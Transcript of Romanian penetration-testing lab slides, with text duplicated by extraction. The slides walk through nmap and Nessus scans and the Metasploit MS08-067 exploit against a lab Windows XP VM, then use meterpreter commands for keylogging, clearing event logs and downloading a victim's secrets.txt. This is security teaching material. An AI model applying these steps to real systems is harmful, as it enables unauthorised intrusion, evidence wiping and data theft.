Laboratory exercise - Network security - Penetration testing
-
Upload
seastorm44 -
Category
Documents
-
view
4.299 -
download
1
description
Transcript of Laboratory exercise - Network security - Penetration testing
Securitatea Retelelor de Securitatea Retelelor de CalculatoareCalculatoareLucrare de laboratorLucrare de laborator
Adrian Furtună
M.Sc. C|EH
Scopul lucrariiScopul lucrarii
Exemplificarea unui atac informatic folosind tool-Exemplificarea unui atac informatic folosind tool-uri open-source:uri open-source:Descarcati local fisierul secrets.txt aflat pe desktop-ul statiei victima Descarcati local fisierul secrets.txt aflat pe desktop-ul statiei victima exploatand o vulnerabilitate a acesteia.exploatand o vulnerabilitate a acesteia.
Parcurgerea etapelor unui atac*:Parcurgerea etapelor unui atac*:1.1. RecunoastereRecunoastere --
2.2. Scanare si EnumerareScanare si Enumerare - Nmap, Nessus- Nmap, Nessus
3.3. Obtinerea accesuluiObtinerea accesului - Metasploit- Metasploit
4.4. Escalarea privilegiilorEscalarea privilegiilor - -
5.5. Mentinerea accesuluiMentinerea accesului --
6.6. Stergerea urmelor si instalarea de backdoorsStergerea urmelor si instalarea de backdoors --
* conform documentatiei pentru certificarea Certified Ethical Hacker (ECCouncil)
Pregatirea Laboratorului Pregatirea Laboratorului (30 min)(30 min)
Descarcati si instalati urmatoarele tool-uri:Descarcati si instalati urmatoarele tool-uri: nmap-5.00-setup.exe nmap-5.00-setup.exe ((http://nmap.org)) Nessus-4.0.2-i386.msi Nessus-4.0.2-i386.msi ((http://www.nessus.org)) framework-3.3.3.exe framework-3.3.3.exe ((http://www.metasploit.org))
Update Nessus pluginsUpdate Nessus plugins ““Obtain an activation code” (home feed)Obtain an activation code” (home feed) ““Register” (dupa inregistrare incepe automat update-ul plugin-urilor)Register” (dupa inregistrare incepe automat update-ul plugin-urilor)
Pregatirea victimei:Pregatirea victimei: Descarcati local si dezarhivati arhiva: Descarcati local si dezarhivati arhiva: winxp_SP2_strip.zipwinxp_SP2_strip.zip Porniti masina virtuala: Porniti masina virtuala: Windows XP Professional.vmxWindows XP Professional.vmx Autentificare: (user: Autentificare: (user: useruser, pass: , pass: useruser))
Verificare conectivitate (private network Host Verificare conectivitate (private network Host Guest):Guest): ping Host ping Host Guest Guest
DisclaimerDisclaimerEthical Hacking / Penetration TestingEthical Hacking / Penetration Testing
Actiuni similare unui atacator/hackerActiuni similare unui atacator/hacker Scop etic:Scop etic:
Descoperirea vulnerabilitatilor Descoperirea vulnerabilitatilor Propunerea de masuri corectivePropunerea de masuri corective Fara actiuni distructive/neaprobateFara actiuni distructive/neaprobate Activitate proactiva, preventivaActivitate proactiva, preventiva
Ce vom exersa… Ce vom exersa…
1.1. Scanare cu NmapScanare cu Nmap Porturi deschisePorturi deschise Versiunile serviciilor expuse Versiunile serviciilor expuse Versiunea sistemului de operareVersiunea sistemului de operare
2.2. Scanare cu NessusScanare cu Nessus Cautare automata de vulnerabilitati pentru Cautare automata de vulnerabilitati pentru
serviciile gasite anteriorserviciile gasite anterior
3.3. Exploatarea unei vulnerabilitati folosind MetasploitExploatarea unei vulnerabilitati folosind Metasploit Obtinerea accesului la sistemul tintaObtinerea accesului la sistemul tinta
Tinta atacului (victima)Tinta atacului (victima)
Sistem de operare: ?????Sistem de operare: ????? Servicii expuse: Servicii expuse: ?????????? Vulnerabilitati: Vulnerabilitati: ?????????? Masina virtuala (vmware)Masina virtuala (vmware) Firewall ON/OFFFirewall ON/OFF Fara antivirusFara antivirus
Scanare folosind Nmap (1)Scanare folosind Nmap (1)http://insecure.org http://insecure.org
nmap –h nmap –h [fragmente][fragmente]HOST DISCOVERY:HOST DISCOVERY: -sP: Ping Scan - go no further than determining if host is online-sP: Ping Scan - go no further than determining if host is online
-PN: Treat all hosts as online -- skip host discovery-PN: Treat all hosts as online -- skip host discovery -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports -n/-R: Never do DNS resolution/Always resolve [default: sometimes]-n/-R: Never do DNS resolution/Always resolve [default: sometimes]SCAN TECHNIQUES:SCAN TECHNIQUES: -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans -sU: UDP Scan-sU: UDP Scan -sN/sF/sX: TCP Null, FIN, and Xmas scans-sN/sF/sX: TCP Null, FIN, and Xmas scansPORT SPECIFICATION AND SCAN ORDER:PORT SPECIFICATION AND SCAN ORDER: -p <port ranges>: Only scan specified ports-p <port ranges>: Only scan specified ports -F: Fast mode - Scan fewer ports than the default scan-F: Fast mode - Scan fewer ports than the default scanSERVICE/VERSION DETECTION:SERVICE/VERSION DETECTION: -sV: Probe open ports to determine service/version info-sV: Probe open ports to determine service/version infoSCRIPT SCAN:SCRIPT SCAN: -sC: equivalent to --script=default-sC: equivalent to --script=default --script=<Lua scripts>: <Lua scripts> is a comma separated list of directories, script-files or script---script=<Lua scripts>: <Lua scripts> is a comma separated list of directories, script-files or script-
categoriescategoriesOS DETECTION:OS DETECTION: -O: Enable OS detection-O: Enable OS detectionOUTPUT:OUTPUT: -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, and Grepable format, respectively, to -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, and Grepable format, respectively, to
the given filename.the given filename.
Scanare folosind Nmap (2)Scanare folosind Nmap (2) nmap -sS -sV -O -F -n 10.0.40.69nmap -sS -sV -O -F -n 10.0.40.69
Scanare folosind Nmap (2)Scanare folosind Nmap (2) nmap -sS -sV -O -F -n 10.0.40.69nmap -sS -sV -O -F -n 10.0.40.69Starting Nmap 5.10BETA1 ( http://nmap.org ) at 2010-01-04 17:20 GTB Standard TimeStarting Nmap 5.10BETA1 ( http://nmap.org ) at 2010-01-04 17:20 GTB Standard Time
Nmap scan report for 10.254.40.69Nmap scan report for 10.254.40.69
Host is up (0.00011s latency).Host is up (0.00011s latency).
Not shown: 98 filtered portsNot shown: 98 filtered ports
PORT STATE SERVICE VERSIONPORT STATE SERVICE VERSION
139/tcp open 139/tcp open netbios-ssnnetbios-ssn
445/tcp open445/tcp open microsoft-ds Microsoft Windows XP microsoft-dsmicrosoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:0C:29:86:DF:91 (VMware)MAC Address: 00:0C:29:86:DF:91 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purposeDevice type: general purpose
Running (JUST GUESSING) : Microsoft Windows XP|2000|2003 (97%)Running (JUST GUESSING) : Microsoft Windows XP|2000|2003 (97%)
Aggressive OS guesses: Aggressive OS guesses: Microsoft Windows XP SP2 (97%), Microsoft Windows XP SP2 (97%), Microsoft Windows XP SP3 (94%), Microsoft Windows Microsoft Windows XP SP3 (94%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft 2000 SP4 or Windows XP SP2 or SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows XP (93%), Microsoft Windows XP SP2 or SP3 (93%), Microsoft Windows 2003 Small Business Server Windows XP (93%), Microsoft Windows XP SP2 or SP3 (93%), Microsoft Windows 2003 Small Business Server (92%), Microsoft Windows XP Professional SP2 (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft (92%), Microsoft Windows XP Professional SP2 (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows 2000 SP4 (91%)Windows 2000 SP4 (91%)
No exact OS matches for host (test conditions non-ideal).No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hopNetwork Distance: 1 hop
Service Info: OS: WindowsService Info: OS: Windows
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.52 secondsNmap done: 1 IP address (1 host up) scanned in 13.52 seconds
Scanare folosind Nessus (1)Scanare folosind Nessus (1)http://www.nessus.org http://www.nessus.org
Nessus Server Manager Nessus Server Manager Start Nessus Server Start Nessus Server
Nessus ClientNessus Client ConnectConnect - clientul se conecteaza la server- clientul se conecteaza la server + Networks to scan+ Networks to scan - se specifica IPul statiei tinta- se specifica IPul statiei tinta + Select a scan policy – se creaza o noua politica de scanare+ Select a scan policy – se creaza o noua politica de scanare
Plugin Selection Plugin Selection Disable All Disable All Plugin Selection Plugin Selection Windows (activeaza numai plugin-urile pentru Windows) Windows (activeaza numai plugin-urile pentru Windows)
Scan NowScan Now - incepe scanarea- incepe scanarea Export Export - salveaza raportul rezultat - salveaza raportul rezultat
Scanare folosind Nessus (2)Scanare folosind Nessus (2)http://www.nessus.org http://www.nessus.org
Obtinerea accesului – Metasploit (1)Obtinerea accesului – Metasploit (1)Arhitectura Metasploit
Metasploit Console, Metasploit WebMetasploit Console, Metasploit Web ModulesModules
Exploits - exploateaza o vulnerabilitate si livreaza un Exploits - exploateaza o vulnerabilitate si livreaza un payloadpayload Auxiliaries – port scanning, dos, fuzzing, etcAuxiliaries – port scanning, dos, fuzzing, etc Payloads - incapsuleaza cod arbitrar (shellcode) care Payloads - incapsuleaza cod arbitrar (shellcode) care este executat este executat
in urma unui exploitin urma unui exploit Nops – genereaza instructiuni de tip NOP cu Nops – genereaza instructiuni de tip NOP cu dimensiune arbitrara dimensiune arbitrara
Tutorial: Tutorial: http://www.offensive-security.com/metasploit-unleashed/http://www.offensive-security.com/metasploit-unleashed/
Obtinerea accesului – Metasploit (2)Obtinerea accesului – Metasploit (2)http://www.metasploit.org
Exploatam vulnerabilitatea ms08-067 (Conficker/Kido/Downadup) Exploatam vulnerabilitatea ms08-067 (Conficker/Kido/Downadup) http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
Start Metasploit WebStart Metasploit Web
Exploits -> Search [ms08-067]Exploits -> Search [ms08-067]
Set TARGETSet TARGET - Windows XP SP2 English- Windows XP SP2 English
Set PAYLOAD Set PAYLOAD - windows/meterpreter/bind_tcp (sau reverse_tcp)- windows/meterpreter/bind_tcp (sau reverse_tcp)
Set OPTIONSSet OPTIONS - RHOST (adresa IP a victimei)- RHOST (adresa IP a victimei)
ExploitExploit
Obtinerea accesului – Metasploit (3)Obtinerea accesului – Metasploit (3)http://www.metasploit.org
Obtinerea accesului – Metasploit (4)Obtinerea accesului – Metasploit (4)http://www.metasploit.org
Stdapi: System Commands Command Description ------- ----------- ------- ----------- clearev Clear the event log clearev Clear the event log execute Execute a command execute Execute a command kill Terminate a process kill Terminate a process ps List running processes ps List running processes reboot Reboots the remote computer reboot Reboots the remote computer shell Drop into a system command shell shell Drop into a system command shell sysinfo Gets information about the remote sysinfo Gets information about the remote system, such as OSsystem, such as OS
Stdapi: User interface CommandsStdapi: User interface Commands Command Description Command Description ------- ----------- ------- ----------- keyscan_dump Dump they keystroke buffer keyscan_dump Dump they keystroke buffer keyscan_start Start capturing keystrokes keyscan_start Start capturing keystrokes keyscan_stop Stop capturing keystrokes keyscan_stop Stop capturing keystrokes
Meterpreter help [fragmente]Meterpreter help [fragmente]Stdapi: File system Commands
Command Description
------- ------------------ -----------
cat Read the contents of a file to the screencat Read the contents of a file to the screen
cd Change directorycd Change directory
del Delete the specified filedel Delete the specified file
download Download a file or directorydownload Download a file or directory
edit Edit a fileedit Edit a file
getlwd Print local working directorygetlwd Print local working directory
getwd Print working directorygetwd Print working directory
lcd Change local working directorylcd Change local working directory
lpwd Print local working directorylpwd Print local working directory
ls List filesls List files
mkdir Make directorymkdir Make directory
pwd Print working directorypwd Print working directory
rm Delete the specified filerm Delete the specified file
rmdir Remove directoryrmdir Remove directory
upload Upload a file or directoryupload Upload a file or directory
Indeplinirea obiectivului exercitiuluiIndeplinirea obiectivului exercitiului
Descarcati local fisierul secrets.txt aflat pe desktop-ul statiei victima Descarcati local fisierul secrets.txt aflat pe desktop-ul statiei victima
exploatand o vulnerabilitate a acesteia..exploatand o vulnerabilitate a acesteia..
Meterpreter:Meterpreter:
pwdpwd
cd Desktopcd Desktop
lsls
download download
The EndThe End
Va multumesc!Va multumesc!
Adrian FurtunãAdrian FurtunãM.Sc. C|EHM.Sc. C|[email protected] [email protected]
? I N T R E B A R I ?? I N T R E B A R I ?